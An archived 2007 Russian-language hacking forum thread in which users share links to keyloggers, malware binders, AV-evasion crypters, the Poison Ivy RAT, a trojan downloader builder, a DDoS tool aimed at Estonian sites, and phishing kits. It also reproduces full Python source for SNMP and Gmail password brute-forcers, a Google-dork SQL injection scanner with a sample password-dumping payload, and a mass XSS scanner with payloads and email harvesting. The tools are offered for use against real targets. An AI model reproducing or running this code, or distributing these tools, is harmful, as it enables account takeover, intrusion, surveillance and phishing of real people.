-Pretator v1.6
-Reductor 1.0b (Beta 4)
-Rephlex Binder 0.2
-SCD 1.0
-Silk Rope v2.0 (Binaries and Source)
-ToP GUI Full 2.0
-Trendy Nigger 1.0b
-X-Exe Joiner
-YAB (Yet Another Binder)


http://rapidshare.com/files/38856990/Binders.rar

Keyloggers Pack

-Activity Keylogger v1.0
-Advanced Invisible Keylogger 1.5 Full
-Aplus
-Barok 1.0
-Chota
-Computer Spy
-Curiosity
-CYBERSHOK 1.0 Private
-DK2Full
-ehks 2.2
-Elite Keylogger 1.0
-EyeSpy
-Fearless Key Spy 2.0
-FSK 2.0
-KeyLog 2.5
-Keylogger
-KGB KeySpy 2.0 Private Xmas Edition
-Metakodix Stealth Keylogger 1.1.0 Cracked
-MSGate 0.1
-Phantom 2
-Phoenix
-Power Spy 5.5.2
-Project Satan 1.1
-RemoteLogger v1.0
-SC-KeyLog 2
-SKL 0.1
-skl0g
-Spy
-Spytector 1.3.1
-Tong KeyLogger
-YSK KeyLog


http://rapidshare.com/files/38855413/Keyloggers.rar

Автор: Creeping Death 23.06.2007, 20:23

Surrogafier 1.0-rc3

Surrogafier is an easy to install three tier web proxy written in PHP. It is free to use and distribute under the GNU General Public License (GPL). A demo install of Surrogafier can be found here.

Features include the ability to remove cookies, the HTTP referer field, the HTTP user-agent field, scripts on the page, and objects, altering the user-agent string to whatever you please, and tunnelling your proxied traffic through a second proxy.

If there existed a freely public install of this script, two standard proxies could be used, one entered in the proxy settings of your browser, and one entered into the publicly installed web proxy, to create a connection being passed between three separate proxy servers before hitting the final destination.

Most web sites should be supported by this web proxy. AJAX applications might have problems with Surrogafier, but I would still like to know if an AJAX application is not working.
.


http://bcable.net/archive.php?surrogafier-1.0-rc3.php

Автор: Creeping Death 26.06.2007, 21:05

PS Crypter
http://rapidshare.com/files/39474720/PS_Crypter.rar

Scofield Cryptor 1.1 [Private]
http://rapidshare.com/files/39475372/Scofield_1.1.rar

Poison Ivy 2.3.0 [unpacked]
http://rapidshare.com/files/39476676/Poison_Ivy_2.3.0__unpacked_.rar

Автор: Creeping Death 27.06.2007, 15:24

Undetector By YaMaNe
http://rapidshare.com/files/39602002/UndetectorByYaMaNe.zip

Slh 4.0.1
http://rapidshare.com/files/39602334/Slh_4.0.1.rar

PHPBB RFI Scanner [Privat]
http://rapidshare.com/files/39533407/PHPBB_RFI_Scanner.rar

Автор: Creeping Death 28.06.2007, 00:39

Z-Dem0n 1.26

http://rapidshare.com/files/39716270/zdemon.zip

J Multi Binder 1.0
http://rapidshare.com/files/39715279/J_Multi_Binder_1.0.rar

Автор: Creeping Death 28.06.2007, 15:40

AntiDote v1.4

http://rapidshare.com/files/39832112/AntiDote_v1.4.rar

The Art Of Deception - Binder [New Stub]

http://rapidshare.com/files/39822101/The_Art_Of_Deception__New_Stub_.rar

Super Binder by "PrinceAli"

http://rapidshare.com/files/39819269/Super_Binder.rar

SkD Undetectabler Pro 2.0 - Crypter

http://rapidshare.com/files/39831559/SkD_Undetectabler_Pro_2.0.rar

Автор: Creeping Death 28.06.2007, 15:47

» Нажмите тут чтобы открыть/скрыть спойлер. «

Автор: Creeping Death 28.06.2007, 16:08

Vulnerabilityes Scanners & Exploiters Pack v1.10

+Absinthe 1.3.1 Windows
+AnonFTP Anonymous Scanner
+Apache Scanner
+CGI Scanner
+DarkScanner 2.0
+FTP-IIS Fx Scanner
+HScan 1.20
+HTTP Server Detector
+ISS Internet Scanner v6.2.1
+JAAScoisX-Code RFI Code Exec Scanner
+N-Stealth Security Scanner v3.7 Built 67
+RFI T00l
+WebCheck
+Win32 x86 RFI Vuln Scanner
+X-Scan 3.3
+XSS LFI and File Discolure Scanner
+Zehir Exploit Scanner
+NetCat
+NMap 4.20

::Port Scanner::

+SuperScan 3.00
+SuperScan 4

::Other Tools::

+QuickSpoof
+PuTTy 0.60


http://rapidshare.com/files/39672244/Vulnscan.rar
Thx to iNs @ + D4RK-R3V-T34M +

Автор: Creeping Death 29.06.2007, 15:23

Themida v1.8.5.5

http://rapidshare.com/files/40014079/Themida_v1.8.5.5.rar

Yahoo!Messenger Monitor Sniffer v3.0

http://rapidshare.com/files/33957234/YahooMonitor.v3.0.rar

Ace Password Sniffer v1.3

The most powerful and effetive password sniffer. Ace Password Sniffer can listen on your LAN and enable network administrators or parents to capture passwords of any network user. Currently Ace Password Sniffer can monitor and capture passwords through FTP, POP3, HTTP, SMTP, Telnet, including some web mail password.

http://rapidshare.com/files/21376566/Ace_Password_Sniffer_V1.3.rar

SNMP Bruteforce

CODE
#!usr/bin/python
#Uses nmap to check if snmp port is open then uses snmpwalk to try and bruteforce
#the community name.

#Required: nmap and snmpwalk

#Changelog: added iprange, single scans and threading for random scans
#Changelog: added the ability to add your own wordlist, it will add to
#the ones given and erase the duplicates

#http://darkcode.ath.cx
#d3hydr8[at]gmail[dot]com

import time, StringIO, commands, sys, re, threading, sets

def timer():
now = time.localtime(time.time())
return time.asctime(now)

def title():
print "\n\t d3hydr8[at]gmail[dot]com snmpBruteForcer v1.2"
print "\t--------------------------------------------------\n"

def scan(option):

nmap = StringIO.StringIO(commands.getstatusoutput('nmap -P0 '+option+' -p 161 | grep open -B 3')[1]).read()
if re.search("command not found",nmap.lower()):
print "\n[-] nmap not installed!!!\n"
sys.exit(1)
else:
ipaddr = re.findall("\d*\.\d*\.\d*\.\d*", nmap)
if ipaddr:
return ipaddr

def brute(ip):
print "\n[+] Attempting BruteForce:",ip
try:
for n in names:
response = StringIO.StringIO(commands.getstatusoutput('snmpwalk '+ip+" "+n)[1]).readlines()
if re.search("command not found",response[0].lower()):
print "\n[-] snmpwalk not installed!!!\n"
sys.exit(1)
else:
if verbose ==1:
print "\t{- Trying:",n
if len(response) > 1:
print "\n\tSuccess:",ip,"Community Name:",n
print "\n\tTry: snmpwalk",ip,n,"\n"
except(), msg:
#print "Error:",msg
pass

class Worker(threading.Thread):
def run(self):
ipaddr = scan("-iR 1")
if ipaddr != None:
for ip in ipaddr:
brute(ip)

if len(sys.argv) <= 2:
title()
print "Usage: ./snmp_random.py <option> \n"
print "Example: ./snmpbrute.py -iprange 192.168.1-100.1-255 -verbose\n"
print "[options]"
print " -s/single <ip>: Bruteforce single ip"
print " -i/-iprange <ip_range>: Scans ip range for snmp to brute force"
print " -r/-random <how many to scan>: Will scan random ip's for snmp to brute force"
print " -l/-list <wordlist file>: Add your own wordlist"
print " -v/-verbose : Verbose Mode\n"
sys.exit(1)

#Add more community names here.
names = ["1234","2read","4changes","CISCO","IBM","OrigEquipMfr","SNMP","SUN","access","admin","agent","all","cisco"
,"community","default","enable","field","guest","hello","ibm","manager","mngt","monitor","netman","network"
,"none","openview","pass","password","passwd","private","proxy","public","read","read-only","read-write"
,"root","router","secret","security","snmp","snmpd","solaris","sun","switch","system","tech","test"
,"world","write"]

for arg in sys.argv[1:]:
if arg.lower() == "-s" or arg.lower() == "-single":
ipaddr = sys.argv[int(sys.argv[1:].index(arg))+2]
mode = "Single IP"
if arg.lower() == "-i" or arg.lower() == "-iprange":
iprange = sys.argv[int(sys.argv[1:].index(arg))+2]
mode = "Ip-Range"
if arg.lower() == "-r" or arg.lower() == "-random":
total = sys.argv[int(sys.argv[1:].index(arg))+2]
mode = "Random"
if arg.lower() == "-l" or arg.lower() == "-list":
wordlist = sys.argv[int(sys.argv[1:].index(arg))+2]
if arg.lower() == "-v" or arg.lower() == "-verbose":
verbose = 1
title()
try:
print "[+] Wordlist:",wordlist,"loading"
words = open(wordlist, "r").readlines()
print "[+] Loaded:",len(words),"names"
names = list(sets.Set(words+names))
except(IOError):
print "Error: Check your wordlist path\n"
sys.exit(1)
except(NameError):
pass

print "[+] Mode:",mode
if mode == "Random":
if total.isdigit() == False:
print "\n[!] How many ips to scan: must be a number\n"
sys.exit(1)
else:
print "[+] Total:",total
if mode == "Ip-Range":
print "[+] Range:",iprange
try:
if verbose ==1:
print "[+] Verbose Mode On"
except(NameError):
verbose = 0
print "[-] Verbose Mode Off"
print "[+] Names Loaded:",len(names)
print "[+] Started:",timer(),"\n"

if mode == "Random":
for i in range(int(total)):
print "[+] Scanning:",i+1,"of",total
work = Worker()
work.start()
time.sleep(1)
if mode == "Single IP":
brute(ipaddr)
if mode == "Ip-Range":
print "[+] Scanning:",iprange
ips = scan(iprange)
if ips != None:
print "[+] Found:",len(ips)
for ip in ips:
brute(ip)
else:
print "\n[!] No SNMP Open"

print "\n[-] Done -",timer(),"\n"

Автор: StuDY 24.07.2007, 15:06

OverSpy v2.5 + Key




Шпион захватывает все сетевые сеансы связи, посещенные вебсайты,
пароли, все электронные почты,- отправленные и полученные, все
напечатанные нажатия клавиши, все компьютерные операции и открытые
документы, берёт скриншоты каждые несколько минут и отправляет
сообщения вам по электронной почте...


Размер :3.8 Mb

Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации.
Зарегистрироваться.

Автор: bdrFsg 24.07.2007, 21:08

Blue's Port Scanner



http://www.bluebitter.de/download/BluesPortScan.zip
Gui-Version v5.0.2 Build #1265

http://www.bluebitter.de/download/CBPS.exeCommand line-Version v4.2 #272
Windows9x/ME/NT/2000/XP

A good port scanner is just one of the basic tools anyone who is
seriously interested in the internet needs.
The BluesPortScan is, i think, the fastest scanner for 32Bit windows which you can found in the net. It scans local 5000 ports in 8sec. on my 2k (P3-866) machine. If you are using Win9x/ME it's a little bit slower... The new version 5 has now features like Port list-scans, AutoCompletion when entering known, existing host names or ips and a big big list of typical port assignments. And of course, it's a little bit more stable, especially under Win9x/Me although these OSs are definitively not the operating systems of choice for the using this program.

Хороший порт-сканер що є однією з базових утіліт для кожного,хто справді зацікавлений в потребах Інтернету.
Я думаю,що це найшвидший сканер портів для 32-розрядних версій Windows,що ви зможете знайти в Інтернеті.Він сканує 5000 локальних портів за 8 секунд на моїй машині(2k (P3-866).Щоправда,якщо Ви використовуєте Win9x/MЕ,то це буде дещо повільніше...Нова,п'ята версія має зараз має такі можливості як сканування портів за певним списком,Автозавершення якщо введені відомі,існуючі імена хостів і справді великий список типових програм,що займають порти.І звичайно,ця версія дещо стабільніша,особливо під Win9x/Me,незважаючи на те що ці ОС безперечно не є тими операційними систеиами які є хорошим вибором для використання даної програми.

Рекомендую!

Автор: ter10n 25.07.2007, 01:13

Релизик от ZyklonTeam



DDoS Attacker

DDoS Attacker многопоточный, поддержка Socks 4, Socks 5.
Написан на Delphi





http://zyklonteam.org/
http://zyklonteam.org/files/ddosattacker.rar
пометка авторов: Special for attacking fuc*ing Estonian sites.

Автор: ter10n 31.07.2007, 01:33

Builder trojan downloader v1.2 beta public



Даунлоадер - загружает на зараженный компьютер файл (например ваш трой) с url-a указанного в билдере.

Принцип работы:
После запуска сливает файл с url-a и сохраняет на зараженый компьютер
в директорию заданную билдером (например в папку винды), и запускает ваш файл.
После запуска вашего файла удаляет свое тело.

Это публичная версия, толком не тестировал, используйте на свой страх и риск.

Релиз от: 04.07.07
Автор: os1r1s
http://secnull.info/
http://rapidshare.com/files/41019158/builder_tdw.rar

Автор: 666Player555 28.08.2007, 16:15

WebProxy
http://rapidshare.com/files/51749387/sh0x-webproxy.rar
PW: Sh0x

PHP MSN
http://rapidshare.com/files/51749150/sh0x-msn.rar
PW: Sh0x

Автор: StuDY 4.09.2007, 18:09

PayPal Bruteforcer ! v1.0b1




Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации.
Зарегистрироваться.


 Paypal.rar ( 170,7 килобайт ) : 123
 

Автор: StuDY 6.09.2007, 14:10

DSJoiner v1.3 от Dr.Samuil

Бывшая приватная версия DSJoiner'a v1.3 от Dr.Samuil'a
Сорцы прилагаются, на момент паблик-релиза не палится ни одним антивирусом.

http://zyklonteam.org/files/DSJoiner13.rar

Автор: Creeping Death 9.09.2007, 19:54

Gmail BruteForce

CODE

#!usr/bin/python

#Gmail Pop3 Brute Forcer

#http://darkcode.ath.cx
#d3hydr8[at]gmail[dot]com

import threading, time, random, sys, poplib
from copy import copy

if len(sys.argv) !=3:
print "\n\t d3hydr8[at]gmail[dot]com GmailPopBruteForcer v1.0"
print "\t --------------------------------------------------\n"
print "\t Usage: ./gmailpopbrute.py <userlist> <wordlist>\n"
sys.exit(1)
server = "pop.gmail.com"
success = []

try:
users = open(sys.argv[1], "r").readlines()
except(IOError):
print "[-] Error: Check your userlist path\n"
sys.exit(1)

try:
words = open(sys.argv[2], "r").readlines()
except(IOError):
print "[-] Error: Check your wordlist path\n"
sys.exit(1)

try:
pop = poplib.POP3_SSL(server, 995)
welcome = pop.getwelcome()
pop.quit()
except (poplib.error_proto):
welcome = "No Response"
pass

print "\n\t d3hydr8[at]gmail[dot]com GmailPopBruteForcer v1.0"
print "\t --------------------------------------------------\n"
print "[+] Server:",server
print "[+] Port: 995"
print "[+] Users Loaded:",len(users)
print "[+] Words Loaded:",len(words)
print "[+] Server response:",welcome,"\n"

wordlist = copy(words)

def reloader():
for word in wordlist:
words.append(word)

def getword():
lock = threading.Lock()
lock.acquire()
if len(words) != 0:
value = random.sample(words, 1)
words.remove(value[0])
else:
print "\n[-] Reloading Wordlist - Changing User\n"
reloader()
value = random.sample(words, 1)
users.remove(users[0])

lock.release()
if len(users) ==1:
return value[0][:-1], users[0]
else:
return value[0][:-1], users[0][:-1]

class Worker(threading.Thread):

def run(self):
value, user = getword()

try:
print "-"*30
print "[+] User:",user,"Password:",value
pop = poplib.POP3_SSL(server, 995)
pop.user(user)
pop.pass_(value)
print "\t\t\n\nLogin successful:",user, value
print "\t\tMail:",pop.stat()[0],"emails"
print "\t\tSize:",pop.stat()[1],"bytes\n\n"
success.append(user)
success.append(value)
success.append(pop.stat()[0])
success.append(pop.stat()[1])
pop.quit()
except (poplib.error_proto), msg:
#print "An error occurred:", msg
pass

for i in range(len(words)*len(users)):
work = Worker()
work.start()
time.sleep(1)
if len(success) >=1:
print "\n\n[+] Login successful:",success[0], success[1]
print "\t[+] Mail:",success[2],"emails"
print "\t[+] Size:",success[3],"bytes\n"
print "\n[-] Done\n"


Inguma (Pentesting Toolkit)

Inguma is a penetration testing toolkit entirely written in python. The framework includes modules to discover hosts, gather information about, fuzz targets, brute force user names and passwords and, of course, exploits for many products.

http://sourceforge.net/project/showfiles.php?group_id=188246&package_id=220086&release_id=486921

SQL Scanner v1.0

CODE

#!/usr/bin/python
#SQL Scanner that will collect hosts using a google query. Will add the
#injection code to each hosts and search for md5 in the source.

#http://darkcode.ath.cx
#d3hydr8[at]gmail[dot]com

import sys, urllib2, re, sets, random, time, socket, httplib

def title():
print "\n\t d3hydr8[at]gmail[dot]com SQL Scanner v1.0"
print "\t-----------------------------------------------"

def usage():
title()
print "\n Usage: python SQLscan.py <options>\n"
print "\n Example: python SQLscan.py -g inurl:'.gov' 200 -s '/index.php?offset=-1/**/UNION/**/SELECT/**/1,2,concat(password)/**/FROM/**/TABLE/*' -write sql_found.txt -v\n"
print "\t[options]"
print "\t -g/-google <query> <num of hosts> : Searches google for hosts"
print "\t -s/-sql <file+injection code> : Vuln. file plux sql injection"
print "\t -w/-write <file> : Writes potential SQL found to file"
print "\t -v/-verbose : Verbose Mode\n"

def StripTags(text):
finished = 0
while not finished:
finished = 1
start = text.find("<")
if start >= 0:
stop = text[start:].find(">")
if stop >= 0:
text = text[:start] + text[start+stop+1:]
finished = 0
return text

def timer():
now = time.localtime(time.time())
return time.asctime(now)

def geturls(query):

counter = 10
urls = []
while counter < int(num):
url = 'http://www.google.com/search?hl=en&q='+query+'&hl=en&lr=&start='+repr(counter)+'&sa=N'
opener = urllib2.build_opener(url)
opener.addheaders = [('User-agent', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)')]
data = opener.open(url).read()
hosts = re.findall(('\w+\.[\w\.\-/]*\.\w+'),StripTags(data))
#Lets add sites found to a list if not already or a google site.
#We don't want to upset the people that got our list for us.
for x in hosts:
if x.find('www') != -1:
x = x[x.find('www'):]
if x not in urls and re.search("google", x) == None:
urls.append(x)
counter += 10
return urls

def tester(victim):

if victim[:7] != "http://":
victim = "http://"+victim.rsplit("/",1)[0]+sql
if verbose ==1:
print "Testing:",victim
try:
source = urllib2.urlopen(victim.rsplit("/",1)[0]+sql, "80").read()
md5s = re.findall("[a-f0-9]"*32,source)
if len(md5s) >= 1:
md5s = list(sets.Set(md5s))
print "\n[!] MD5 Found:",''.join([str(i) for i in victim.split("/",3)[:3]])[5:]
for md5 in md5s:
print "\t[",md5,"]\n"
found_sql.append(victim)
except(socket.timeout, socket.gaierror, socket.error, IOError, ValueError, httplib.BadStatusLine):
pass
except(KeyboardInterrupt):
print "\n[-] Cancelled -",timer(),"\n"
sys.exit(1)
except():
pass

if len(sys.argv) < 6:
usage()
sys.exit(1)

for arg in sys.argv[1:]:
if arg.lower() == "-v" or arg.lower() == "-verbose":
verbose = 1
if arg.lower() == "-w" or arg.lower() == "-write":
txt = sys.argv[int(sys.argv[1:].index(arg))+2]
if arg.lower() == "-s" or arg.lower() == "-sql":
sql = sys.argv[int(sys.argv[1:].index(arg))+2]
if arg.lower() == "-g" or arg.lower() == "-google":
query = sys.argv[int(sys.argv[1:].index(arg))+2]
num = sys.argv[int(sys.argv[1:].index(arg))+3]
title()
socket.setdefaulttimeout(10)
found_sql = []
count = 0
print "\n[+] SQL_scan Loaded"
try:
if verbose ==1:
print "[+] Verbose Mode On"
except(NameError):
verbose = 0
print "[-] Verbose Mode Off"
if sql[:1] != "/":
sql = "/"+sql
print "[+] SQL:",sql
try:
if txt:
print "[+] File:",txt
except(NameError):
txt = None
pass
try:
if num.isdigit() == False:
print "\n[-] Argument [",num,"] must be a number.\n"
sys.exit(1)
else:
if int(num) <= 10:
print "\n[-] Argument [",num,"] must be greater than 10.\n"
sys.exit(1)
except(IndexError):
print "\n[-] Need number of hosts to collect.\n"
sys.exit(1)
query = re.sub("\s","+",query)
print "[+] Query:",query
print "[+] Number:",num
print "[+] Querying Google..."
urls = geturls(query)
print "[+] Collected:",len(urls),"hosts"
print "[+] Started:",timer()
print "[+] Scanning hosts..."
print "\n[-] Cancel: Press Ctrl-C"
for url in urls:
tester(url)
time.sleep(3)
print "-"*65
print "\n\n[+] Potential SQL found:",len(found_sql),"\n"
time.sleep(3)
if txt != None and len(found_sql) >=1:
sql_file = open(txt, "a")
sql_file.writelines("\n\td3hydr8[at]gmail[dot]com SQL Scanner v1.0\n")
sql_file.writelines("\t------------------------------------------\n\n")
print "[+] Writing Data:",txt
else:
print "[-] No data written to disk"
for k in found_sql:
count+=1
if txt != None:
sql_file.writelines("["+str(count)+"] "+k+"\n")
print "\n["+str(count)+"]",k
print "\n[-] Done -",timer(),"\n"



XSS Scanner ver 1.3

CODE

#!/usr/bin/python

#XSS Scanner that can find hosts using a google query or search one site.

#If XSS is found it attempts to collect email addresses to further your attack

#or warn the target of the flaw. When the scan is complete

#it will print out the XSS's found and or write to file, it will find false positives

#so manually check before getting to excited. It also has verbose mode and

#you can change the alert pop-up message, check options!!

#

##Changelog v1.1: added options, verbose, write to file, change alert

#Changelog v1.2: added more xss payloads, an exception, better syntax, more runtime feedback

#Changelog v1.3: added https support, more xss payloads, the ability to change port, fixed #some user input problems, exiting without error messages with Ctrl-C (KeyboardInterrupt)

#

#d3hydr8[at]gmail[dot]com



import sys, urllib2, re, sets, random, httplib, time, socket



def title():

print "nt d3hydr8[at]gmail[dot]com XSS Scanner v1.3"

print "t-----------------------------------------------"



def usage():

title()

print "n Usage: python XSSscan.py <option>n"

print "n Example: python XSSscan.py -g inurl:'.gov' 200 -a 'XSS h4ck3d' -write xxs_found.txt -vn"

print "t[options]"

print "t -g/-google <query> <num of hosts> : Searches google for hosts"

print "t -s/-site <website> <port>: Searches just that site, (default port 80)"

print "t -a/-alert <alert message> : Change the alert pop-up message"

print "t -w/-write <file> : Writes potential XSS found to file"

print "t -v/-verbose : Verbose Moden"



def StripTags(text):

finished = 0

while not finished:

finished = 1

start = text.find("<")

if start >= 0:

stop = text[start:].find(">")

if stop >= 0:

text = text[:start] + text[start+stop+1:]

finished = 0

return text



def timer():

now = time.localtime(time.time())

return time.asctime(now)



def geturls(query):



counter = 10

urls = []



while counter < int(sys.argv[3]):

url = 'http://www.google.com/search?hl=en&q='+query+'&hl=en&lr=&start='+repr(counter)+'&sa=N'

opener = urllib2.build_opener(url)

opener.addheaders = [('User-agent', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)')]

data = opener.open(url).read()

hosts = re.findall(('w+.[w.-/]*.w+'),StripTags(data))

#Lets add sites found to a list if not already or a google site.

#We don't want to upset the people that got our list for us.

for x in hosts:

if x.find('www') != -1:

x = x[x.find('www'):]

if x not in urls and re.search("google", x) == None:

urls.append(x)

counter += 10

return urls



def getemails(site):



try:

if site.split("/",1)[0] not in done:

print "t[+] Collecting Emails:",site.split("/",1)[0]

webpage = urllib2.urlopen(proto+"://"+site.split("/",1)[0], port).read()

emails = re.findall('[w.-]+@[w.-]+.www', webpage)

done.append(site.split("/",1)[0])

if emails:

return emails

except(KeyboardInterrupt):

print "n[-] Cancelled -",timer(),"n"

sys.exit(1)

except(IndexError):

pass



def getvar(site):



names = []

actions = []

print "n","-"*45

print "[+] Searching:",site

try:

webpage = urllib2.urlopen(proto+"://"+site, port).read()

emails = re.findall('[w.-]+@[w.-]+.www', webpage)

var = re.findall("?[w.-/]*=",webpage)

if len(var) >=1:

var = list(sets.Set(var))

found_action = re.findall("action="[w.-/]*"", webpage.lower())

found_action = list(sets.Set(found_action))

if len(found_action) >= 1:

for a in found_action:

a = a.split('"',2)[1]

try:

if a[0] != "/":

a = "/"+a

except(IndexError):

pass

actions.append(a)

found_names = re.findall("name="[w.-/]*"", webpage.lower())

found_names = list(sets.Set(found_names))

for n in found_names:

names.append(n.split('"',2)[1])

print "[+] Variables:",len(var),"| Actions:",len(actions),"| Fields:",len(names)

print "[+] Avg Requests:",(len(var)+len(names)+(len(actions)*len(names))+(len(actions)*len(names)))*
len(xss_payloads)

if len(var) >= 1:

for v in var:

if site.count("/") >= 2:

for x in xrange(site.count("/")):

for xss in xss_payloads:

tester(site.rsplit('/',x+1)[0]+"/"+v+xss)

for xss in xss_payloads:

tester(site+"/"+v+xss)



if len(names) >= 1:

for n in names:

if site.count("/") >= 2:

for x in xrange(site.count("/")):

for xss in xss_payloads:

tester(site.rsplit('/',x+1)[0]+"/"+"?"+n+"="+xss)

for xss in xss_payloads:

tester(site+"/"+"?"+n+"="+xss)



if len(actions) != 0 and len(names) >= 1:

for a in actions:

for n in names:

if site.count("/") >= 2:

for x in xrange(site.count("/")):

for xss in xss_payloads:

tester(site.rsplit('/',x+1)[0]+a+"?"+n+"="+xss)

#tester(site.split("/")[0]+a+"?"+n+"="+xss)



if len(actions) != 0 and len(var) >= 1:

for a in actions:

for v in var:

if site.count("/") >= 2:

for x in xrange(site.count("/")):

for xss in xss_payloads:

tester(site.rsplit('/',x+1)[0]+a+v+xss)

else:

for xss in xss_payloads:

tester(site.split("/")[0]+a+v+xss)

if sys.argv[1].lower() == "-g" or sys.argv[1].lower() == "-google":

urls.remove(site)



except(socket.timeout, IOError, ValueError, socket.error, socket.gaierror):

if sys.argv[1].lower() == "-g" or sys.argv[1].lower() == "-google":

urls.remove(site)

pass

except(KeyboardInterrupt):

print "n[-] Cancelled -",timer(),"n"

sys.exit(1)



def tester(target):



if verbose ==1:

if message != "":

print "Target:",target.replace(alert ,message)

else:

print "Target:",target



try:

source = urllib2.urlopen(proto+"://"+target, port).read()

h = httplib.HTTPConnection(target.split('/')[0], int(port))

try:

h.request("GET", "/"+target.split('/',1)[1])

except(IndexError):

h.request("GET", "/")

r1 = h.getresponse()

if verbose ==1:

print "t[+] Response:",r1.status, r1.reason

if re.search(alert.replace("%2D","-"), source) != None and r1.status not in range(303, 418):

if target not in found_xss:

if message != "":

print "n[!] XSS:", target.replace(alert ,message)

else:

print "n[!] XSS:", target

print "t[+] Response:",r1.status, r1.reason

emails = getemails(target)

if emails:

print "t[+] Email:",len(emails),"addressesn"

found_xss.setdefault(target, list(sets.Set(emails)))

else:

found_xss[target] = "None"

except(socket.timeout, socket.gaierror, socket.error, IOError, ValueError, httplib.BadStatusLine, httplib.IncompleteRead, httplib.InvalidURL):

pass

except(KeyboardInterrupt):

print "n[-] Cancelled -",timer(),"n"

sys.exit(1)

except():

pass



if len(sys.argv) <= 2:

usage()

sys.exit(1)



for arg in sys.argv[1:]:

if arg.lower() == "-v" or arg.lower() == "-verbose":

verbose = 1

if arg.lower() == "-w" or arg.lower() == "-write":

txt = sys.argv[int(sys.argv[1:].index(arg))+2]

if arg.lower() == "-a" or arg.lower() == "-alert":

message = re.sub("s","%2D",sys.argv[int(sys.argv[1:].index(arg))+2])



title()

socket.setdefaulttimeout(3)

found_xss = {}

done = []

count = 0

proto = "http"

alert = "D3HYDR8%2D0wNz%2DY0U"

print "n[+] XSS_scan Loaded"

try:

if verbose ==1:

print "[+] Verbose Mode On"

except(NameError):

verbose = 0

print "[-] Verbose Mode Off"

try:

if message:

print "[+] Alert:",message

except(NameError):

print "[+] Alert:",alert

message = ""

pass



xss_payloads = ["%22%3E%3Cscript%3Ealert%28%27"+alert+"%27%29%3C%2Fscript%3E",

"%22%3E<IMG SRC="java script:alert(%27"+alert+"%27);">",

"%22%3E<script>alert(String.fromCharCode(68,51,72,89,68,82,56,45,48,119,78,122,45,89,48,85))
;</script>",

"'';!--"<%27"+alert+"%27>=&{()}",

"';alert(0)//';alert(1)//%22;alert(2)//%22;alert(3)//--%3E%3C/SCRIPT%3E%22%3E'%3E%3CSCRIPT%3Ealert(%27"+alert+"%27)%3C/SCRIPT%3E=&{}%22);}alert(6);function",

"</textarea><script>alert(%27"+alert+"%27)</script>"]

try:

if txt:

print "[+] File:",txt

except(NameError):

txt = None

pass

print "[+] XSS Payloads:",len(xss_payloads)

if sys.argv[1].lower() == "-g" or sys.argv[1].lower() == "-google":

try:

if sys.argv[3].isdigit() == False:

print "n[-] Argument [",sys.argv[3],"] must be a number.n"

sys.exit(1)

else:

if int(sys.argv[3]) <= 10:

print "n[-] Argument [",sys.argv[3],"] must be greater than 10.n"

sys.exit(1)

except(IndexError):

print "n[-] Need number of hosts to collect.n"

sys.exit(1)

query = re.sub("s","+",sys.argv[2])

port = "80"

print "[+] Query:",query

print "[+] Querying Google..."

urls = geturls(query)

print "[+] Collected:",len(urls),"hosts"

print "[+] Started:",timer()

print "n[-] Cancel: Press Ctrl-C"

time.sleep(3)

while len(urls) > 0:

print "-"*45

print "n[-] Length:",len(urls),"remain"

getvar(random.choice(urls))

if sys.argv[1].lower() == "-s" or sys.argv[1].lower() == "-site":

site = sys.argv[2]

try:

if sys.argv[3].isdigit() == False:

port = "80"

else:

port = sys.argv[3]

except(IndexError):

port = "80"

print "[+] Site:",site

print "[+] Port:",port

if site[:7] == "http://":

site = site.replace("http://","")

if site[:8] == "https://":

proto = "https"

if port == "80":

print "[!] Using port 80 with https? (443)"

site = site.replace("https://","")

print "[+] Started:",timer()

print "n[-] Cancel: Press Ctrl-C"

time.sleep(4)

getvar(site)



print "-"*65

print "nn[+] Potential XSS found:",len(found_xss),"n"

time.sleep(3)

if txt != None and len(found_xss) >=1:

xss_file = open(txt, "a")

xss_file.writelines("ntd3hydr8[at]gmail[dot]com XSS Scanner v1.3n")

xss_file.writelines("t------------------------------------------nn")

print "[+] Writing Data:",txt

else:

print "[-] No data written to disk"

for k in found_xss.keys():

count+=1

if txt != None:

if message != "":

xss_file.writelines("["+str(count)+"] "+k.replace(alert ,message)+"n")

else:

xss_file.writelines("["+str(count)+"] "+k+"n")

if message != "":

print "n["+str(count)+"]",k.replace(alert ,message)

else:

print "n["+str(count)+"]",k

addrs = found_xss[k]

if addrs != "None":

print "t[+] Email addresses:"

for addr in addrs:

if txt != None:

xss_file.writelines("tEmail: "+addr+"n")

print "t -",addr

print "n[-] Done -",timer(),"n"


SQL Injection Pentesting TooL

--- [Added]
- Work with injection through GET,POST,GET(inside Cookie),POST(inside Cookie)
- Terminal for HTTP RAW (analogue of InetHack)
- Upload file to server through SQL
- Reading every available for reading file on the server:)
- BackConnect from DB = MsSQL
- Dump DB, if type of DB is MsSQL
- Possibility of a Basic authentication
- Possible Determine of the fields of a SELECT query using the ORDER BY,GROUP BY,UNION SELECT
- Possible replacements comments to analog when filtering
- Possible replacements spaces to analog when filtering
- Possibility of autodetection of KeyWord
- Possibility of autodetection of type DB
- Ability to connect to the servers at random port
- Ability to connect to the proxy-servers to a random port
--- [Fixed]
- A accurate definition of quantity the fields that supports printing values
- A accurate with proxy-servers


http://sqltool.itdefence.ru/setup.rar

Автор: Creeping Death 11.09.2007, 13:26

Root@Shell
http://www.w4ck1ng.com/Root_Shell.rar

Автор: Creeping Death 11.09.2007, 20:04

пошел фишинг...

Adult Friend Finder

Код
http://rapidshare.com/files/48422910/Adult_Friend_Finder.rar



Amazon
Код
http://rapidshare.com/files/48422911/Amazon.rar



Bebo
Код
http://rapidshare.com/files/48422912/Bebo.rar



Break

Код
http://rapidshare.com/files/48422913/Break.rar



DeviantArt
Код
http://rapidshare.com/files/48422914/DeviantArt.rar


FlickR
Код
http://rapidshare.com/files/48422915/FlickR.rar


Freewebs
Код
http://rapidshare.com/files/48422916/FreeWebs.rar



Geocities

Код
http://rapidshare.com/files/48422917/GeoCities.rar



LiveJournal
Код
http://rapidshare.com/files/48422918/LiveJournal.rar



Playstation Underground
Код
http://rapidshare.com/files/48422919/Playstation_Underground.rar



PornoTube
Код
http://rapidshare.com/files/48422500/PornoTube.rar



SendSpace
Код
http://rapidshare.com/files/48422501/SendSpace.rar



SourceForge

Код
http://rapidshare.com/files/48422502/SourceForge.rar


Tagged
Код
http://rapidshare.com/files/48422503/Tagged.rar



